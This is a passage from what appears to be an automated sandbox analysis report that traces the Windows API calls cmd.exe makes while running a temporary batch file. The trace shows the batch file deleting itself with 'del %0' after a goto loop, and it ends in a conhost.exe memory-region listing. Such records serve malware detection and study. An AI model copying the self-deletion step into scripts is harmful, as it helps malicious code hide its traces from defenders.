_String2="goto") returned -1 [0070.586] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0070.586] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0070.586] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0070.586] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0070.586] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0070.587] _tell (_FileHandle=3) returned 91 [0070.587] _close (_FileHandle=3) returned 0 [0070.587] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f108 | out: _Buffer="\r\n") returned 2 [0070.587] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.587] GetFileType (hFile=0x3c) returned 0x2 [0070.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.587] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e0 | out: lpMode=0x58f0e0) returned 1 [0070.587] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.587] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f0f8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f0f8*=0x2) returned 1 [0070.587] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0070.587] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0070.587] _vsnwprintf (in: _Buffer=0xa09be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x58f104 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0070.588] _vsnwprintf (in: _Buffer=0xa09c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x58f104 | out: _Buffer=">") returned 1 [0070.588] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.588] GetFileType (hFile=0x3c) returned 0x2 [0070.588] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.588] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e4 | out: lpMode=0x58f0e4) returned 1 [0070.588] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.588] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa09be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x58f0fc, lpReserved=0x0 | out: lpBuffer=0xa09be0*, lpNumberOfCharsWritten=0x58f0fc*=0x1e) returned 1 [0070.588] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x58f3a4 | out: _Buffer="if ") returned 3 [0070.588] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.588] GetFileType (hFile=0x3c) returned 0x2 [0070.588] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.588] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f37c | out: lpMode=0x58f37c) returned 1 [0070.589] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.589] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x58f394, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f394*=0x3) returned 1 [0070.589] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x58f390 | out: _Buffer="errorlevel 1 ") returned 13 [0070.589] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.589] GetFileType (hFile=0x3c) returned 0x2 [0070.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.589] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f368 | out: lpMode=0x58f368) returned 1 [0070.589] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.589] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x58f380, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f380*=0xd) returned 1 [0070.590] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.590] GetFileType (hFile=0x3c) returned 0x2 [0070.590] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.590] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f374 | out: lpMode=0x58f374) returned 1 [0070.590] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.590] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7b7960*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x58f38c, lpReserved=0x0 | out: lpBuffer=0x7b7960*, lpNumberOfCharsWritten=0x58f38c*=0x4) returned 1 [0070.590] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x58f394 | out: _Buffer=" 18135671 ") returned 10 [0070.590] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.590] GetFileType (hFile=0x3c) returned 0x2 [0070.590] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.590] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f36c | out: lpMode=0x58f36c) returned 1 [0070.591] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.591] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x58f384, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f384*=0xa) returned 1 [0070.591] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f3b8 | out: _Buffer="\r\n") returned 2 [0070.591] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.591] GetFileType (hFile=0x3c) returned 0x2 [0070.591] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.591] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f390 | out: lpMode=0x58f390) returned 1 [0070.592] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.592] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f3a8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f3a8*=0x2) returned 1 [0070.592] wcstol (in: _String="1", _EndPtr=0x0, _Radix=10 | out: _EndPtr=0x0) returned 1 [0070.592] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.592] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0070.592] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.592] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0070.592] _get_osfhandle (_FileHandle=0) returned 0x38 [0070.592] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0070.593] SetConsoleInputExeNameW () returned 0x1 [0070.593] GetConsoleOutputCP () returned 0x1b5 [0070.593] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0070.593] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.593] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x58f374, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0070.593] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0070.593] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.593] SetFilePointer (in: hFile=0xb8, lDistanceToMove=91, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b [0070.594] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.594] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b [0070.594] ReadFile (in: hFile=0xb8, lpBuffer=0xa1a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x58f344, lpOverlapped=0x0 | out: lpBuffer=0xa1a960*, lpNumberOfBytesRead=0x58f344*=0x13, lpOverlapped=0x0) returned 1 [0070.594] SetFilePointer (in: hFile=0xb8, lDistanceToMove=104, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x68 [0070.594] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xa1a960, cbMultiByte=13, lpWideCharStr=0xa057e0, cchWideChar=8191 | out: lpWideCharStr=":4276831624\r\n 1 goto 18135671\r\n\r\n") returned 13 [0070.594] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.594] GetFileType (hFile=0xb8) returned 0x1 [0070.594] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.594] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x68 [0070.594] _tell (_FileHandle=3) returned 104 [0070.594] _close (_FileHandle=3) returned 0 [0070.595] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x58f374, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0070.595] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0070.595] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.595] SetFilePointer (in: hFile=0xb8, lDistanceToMove=104, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x68 [0070.595] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.595] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x68 [0070.595] ReadFile (in: hFile=0xb8, lpBuffer=0xa1a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x58f344, lpOverlapped=0x0 | out: lpBuffer=0xa1a960*, lpNumberOfBytesRead=0x58f344*=0x6, lpOverlapped=0x0) returned 1 [0070.595] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xa1a960, cbMultiByte=6, lpWideCharStr=0xa057e0, cchWideChar=8191 | out: lpWideCharStr="del %031624\r\n 1 goto 18135671\r\n\r\n") returned 6 [0070.595] _wcsicmp (_String1="del", _String2=")") returned 59 [0070.595] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0070.595] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0070.595] _wcsicmp (_String1="IF", _String2="del") returned 5 [0070.595] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0070.595] _wcsicmp (_String1="REM", _String2="del") returned 14 [0070.595] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0070.595] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.596] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6e [0070.596] ReadFile (in: hFile=0xb8, lpBuffer=0xa1a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x58f23c, lpOverlapped=0x0 | out: lpBuffer=0xa1a960*, lpNumberOfBytesRead=0x58f23c*=0x0, lpOverlapped=0x0) returned 1 [0070.596] GetLastError () returned 0x0 [0070.596] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.596] GetFileType (hFile=0xb8) returned 0x1 [0070.596] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.596] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6e [0070.596] _tell (_FileHandle=3) returned 110 [0070.596] _close (_FileHandle=3) returned 0 [0070.596] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f108 | out: _Buffer="\r\n") returned 2 [0070.596] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.596] GetFileType (hFile=0x3c) returned 0x2 [0070.596] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.596] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e0 | out: lpMode=0x58f0e0) returned 1 [0070.597] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.597] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f0f8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f0f8*=0x2) returned 1 [0070.597] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0070.597] _vsnwprintf (in: _Buffer=0xa09be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x58f104 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0070.597] _vsnwprintf (in: _Buffer=0xa09c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x58f104 | out: _Buffer=">") returned 1 [0070.597] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.597] GetFileType (hFile=0x3c) returned 0x2 [0070.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.597] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e4 | out: lpMode=0x58f0e4) returned 1 [0070.597] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.597] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa09be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x58f0fc, lpReserved=0x0 | out: lpBuffer=0xa09be0*, lpNumberOfCharsWritten=0x58f0fc*=0x1e) returned 1 [0070.598] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.598] GetFileType (hFile=0x3c) returned 0x2 [0070.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.598] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f384 | out: lpMode=0x58f384) returned 1 [0070.598] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.598] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7c8548*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x58f39c, lpReserved=0x0 | out: lpBuffer=0x7c8548*, lpNumberOfCharsWritten=0x58f39c*=0x3) returned 1 [0070.598] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x58f3a4 | out: _Buffer=" \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\" ") returned 54 [0070.598] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.598] GetFileType (hFile=0x3c) returned 0x2 [0070.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.598] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f37c | out: lpMode=0x58f37c) returned 1 [0070.599] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.599] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x58f394, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f394*=0x36) returned 1 [0070.599] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f3b8 | out: _Buffer="\r\n") returned 2 [0070.599] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.599] GetFileType (hFile=0x3c) returned 0x2 [0070.599] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0070.599] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f390 | out: lpMode=0x58f390) returned 1 [0070.599] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.599] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f3a8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f3a8*=0x2) returned 1 [0070.600] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0070.600] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0070.600] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0070.600] GetConsoleTitleW (in: lpConsoleTitle=0x58ef28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0070.600] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0070.600] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0070.600] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0070.601] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x58ecd0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0070.601] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x58dd40 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0070.601] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x58df74, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x58df78, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x58df74*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0070.601] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0070.601] _wcsicmp (_String1="11F7.bat", _String2=".") returned 3 [0070.601] _wcsicmp (_String1="11F7.bat", _String2="..") returned 3 [0070.601] GetFileAttributesW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat")) returned 0x20 [0070.601] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7c9b08 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0070.601] SetErrorMode (uMode=0x0) returned 0x0 [0070.601] SetErrorMode (uMode=0x1) returned 0x0 [0070.601] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", nBufferLength=0x104, lpBuffer=0x58e3a0, lpFilePart=0x58e374 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", lpFilePart=0x58e374*="11F7.bat") returned 0x32 [0070.601] SetErrorMode (uMode=0x0) returned 0x1 [0070.601] GetFileAttributesW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee")) returned 0x10 [0070.602] _wcsicmp (_String1="11F7.bat", _String2=".") returned 3 [0070.602] _wcsicmp (_String1="11F7.bat", _String2="..") returned 3 [0070.602] GetFileAttributesW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat")) returned 0x20 [0070.602] FindFirstFileExW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", fInfoLevelId=0x0, lpFindFileData=0x7b9e8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7b9e8c) returned 0x7ba690 [0070.602] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0070.602] NtOpenFile (in: FileHandle=0x58e274, DesiredAccess=0x10000, ObjectAttributes=0x58e23c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x58e264, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x58e274*=0xb0, IoStatusBlock=0x58e264*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0070.603] RtlReleaseRelativeName () returned 0x58e254 [0070.603] RtlFreeAnsiString (AnsiString="\\") [0070.603] NtQueryVolumeInformationFile (in: FileHandle=0xb0, IoStatusBlock=0x58e1a0, FsInformation=0x58e1a8, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x58e1a0, FsInformation=0x58e1a8) returned 0x0 [0070.603] CloseHandle (hObject=0xb0) returned 1 [0070.604] FindNextFileW (in: hFindFile=0x7ba690, lpFindFileData=0x7b9e8c | out: lpFindFileData=0x7b9e8c) returned 0 [0070.604] GetLastError () returned 0x12 [0070.604] FindClose (in: hFindFile=0x7ba690 | out: hFindFile=0x7ba690) returned 1 [0070.605] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.605] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0070.605] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.605] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0070.605] _get_osfhandle (_FileHandle=0) returned 0x38 [0070.605] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0070.605] SetConsoleInputExeNameW () returned 0x1 [0070.605] GetConsoleOutputCP () returned 0x1b5 [0070.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0070.606] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.606] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x58f374, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.606] GetLastError () returned 0x2 [0070.606] _get_osfhandle (_FileHandle=2) returned 0x40 [0070.606] GetFileType (hFile=0x40) returned 0x2 [0070.606] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0070.606] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x58f30c | out: lpMode=0x58f30c) returned 1 [0070.606] _get_osfhandle (_FileHandle=2) returned 0x40 [0070.606] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x40, lpConsoleScreenBufferInfo=0x58f35c | out: lpConsoleScreenBufferInfo=0x58f35c) returned 1 [0070.607] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0xa16940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0070.802] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0xa16940, nSize=0x2000, Arguments=0x58f38c | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0070.802] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x58f340, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f340*=0x21) returned 1 [0070.805] CmdBatNotificationStub () returned 0x1 [0070.805] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.805] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0070.805] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.805] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0070.806] _get_osfhandle (_FileHandle=0) returned 0x38 [0070.806] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0070.806] SetConsoleInputExeNameW () returned 0x1 [0070.806] GetConsoleOutputCP () returned 0x1b5 [0070.807] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0070.807] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.807] exit (_Code=1) Thread: id = 16 os_tid = 0xf98 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x24f64000" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xf40" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 354 start_va = 0x7f485000 end_va = 0x7f485fff entry_point = 0x0 region_type = private name = "private_0x000000007f485000" filename = "" Region: id = 355 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 356 start_va = 0x807ce80000 end_va = 0x807ce9ffff entry_point = 0x0 region_type = private name = "private_0x000000807ce80000" filename = "" Region: id = 357 start_va = 0x807cea0000 end_va = 0x807ceb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807cea0000" filename = "" Region: id = 358 start_va = 0x807cec0000 end_va = 0x807cefffff entry_point = 0x0 region_type = private name = "private_0x000000807cec0000" filename = "" Region: id = 359 start_va = 0x7df5ff580000 end_va = 0x7ff5ff57ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff580000" filename = "" Region: id = 360 start_va = 0x7ff71e7e0000 end_va = 0x7ff71e802fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff71e7e0000" filename = "" Region: id = 361 start_va = 0x7ff71e80d000 end_va = 0x7ff71e80efff entry_point = 0x0 region_type = private name = "private_0x00007ff71e80d000" filename = "" Region: id = 362 start_va = 0x7ff71e80f000 end_va = 0x7ff71e80ffff entry_point = 0x0 region_type = private name = "private_0x00007ff71e80f000" filename = "" Region: id = 363 start_va = 0x7ff71ef00000 end_va = 0x7ff71ef10fff entry_point = 0x7ff71ef00000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 364 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 365 start_va = 0x807cf60000 end_va = 0x807d05ffff entry_point = 0x0 region_type = private name = "private_0x000000807cf60000" filename = "" Region: id = 366 start_va = 0x7ff8eb870000 end_va = 0x7ff8eba4cfff entry_point = 0x7ff8eb870000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 367 start_va = 0x7ff8ee2d0000 end_va = 0x7ff8ee37cfff entry_point = 0x7ff8ee2d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 368 start_va = 0x807ce80000 end_va = 0x807ce8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000807ce80000" filename = "" Region: id = 369 start_va = 0x807cf00000 end_va = 0x807cf3ffff entry_point = 0x0 region_type = private name = "private_0x000000807cf00000" filename = "" Region: id = 370 start_va = 0x807d060000 end_va = 0x807d11dfff entry_point = 0x807d060000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 371 start_va = 0x7ff71e6e0000 end_va = 0x7ff71e7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff71e6e0000" filename = "" Region: id = 372 start_va = 